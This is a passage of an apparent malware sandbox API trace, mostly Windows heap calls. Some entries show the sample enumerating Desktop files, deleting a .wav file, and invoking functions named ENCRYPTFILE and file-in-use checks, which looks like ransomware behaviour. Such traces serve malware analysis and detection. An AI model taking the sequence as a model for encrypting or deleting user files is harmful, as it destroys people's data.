hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0126.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.072] FreeLibrary (hLibModule=0x756e0000) returned 1 [0126.072] CloseHandle (hObject=0x2a0) returned 1 [0126.073] CloseHandle (hObject=0x258) returned 1 [0126.075] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav", lpFilePart=0x0) returned 0x2f [0126.075] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\tk8qmak8ns0qz6i3ucg.wav")) returned 0x20 [0126.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37376ed0, ftCreationTime.dwHighDateTime=0x1d5eaa9, ftLastAccessTime.dwLowDateTime=0x382ebf10, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0x382ebf10, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0xff62, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="tK8Qmak8ns0qz6I3UcG.wav", cAlternateFileName="TK8QMA~1.WAV")) returned 0x41ac500 [0126.076] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\tk8qmak8ns0qz6i3ucg.wav")) returned 1 [0126.126] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37376ed0, ftCreationTime.dwHighDateTime=0x1d5eaa9, ftLastAccessTime.dwLowDateTime=0x382ebf10, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0x382ebf10, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0xff62, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="tK8Qmak8ns0qz6I3UcG.wav", cAlternateFileName="TK8QMA~1.WAV")) returned 0 [0126.126] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0126.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0126.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0126.126] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0126.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7860 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0126.127] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0126.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0126.128] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9f2890, ftCreationTime.dwHighDateTime=0x1d5e26a, ftLastAccessTime.dwLowDateTime=0x2521ef00, ftLastAccessTime.dwHighDateTime=0x1d5ea03, ftLastWriteTime.dwLowDateTime=0x2521ef00, ftLastWriteTime.dwHighDateTime=0x1d5ea03, nFileSizeHigh=0x0, nFileSizeLow=0x11885, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="uaY41mSq.csv", cAlternateFileName="")) returned 0x41ac500 [0126.128] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0126.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0126.129] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0126.129] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0126.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0126.130] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0126.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0126.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0126.132] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0126.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0126.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0126.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0126.135] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.137] HeapFree (in: 